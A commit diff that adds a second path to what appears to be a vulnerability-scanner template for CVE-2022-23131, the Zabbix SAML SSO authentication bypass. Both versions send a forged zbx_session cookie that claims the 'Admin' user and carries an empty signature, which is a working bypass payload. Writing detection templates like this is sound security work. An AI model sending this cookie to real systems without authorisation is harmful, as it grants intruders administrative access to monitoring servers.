additional path support

2022-02-26 00:09:07 +05:30 · 2022-02-26 00:09:07 +05:30 · 6bda604a36
parent 9943089f81
commit 6bda604a36
1 changed files with 8 additions and 5 deletions
--- a/cves/2022/CVE-2022-23131.yaml
+++ b/cves/2022/CVE-2022-23131.yaml
@ -19,12 +19,15 @@ info:
  tags: cve,cve2022,zabbix,auth-bypass,saml,sso

 requests:
-  - raw:
-      - |
-        GET /index_sso.php HTTP/1.1
-        Host: {{Hostname}}
-        Cookie: zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9
+  - method: GET
+    path:
+      - "{{BaseURL}}/zabbix/index_sso.php"
+      - "{{BaseURL}}/index_sso.php"

+    headers:
+      Cookie: "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"
+
+    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status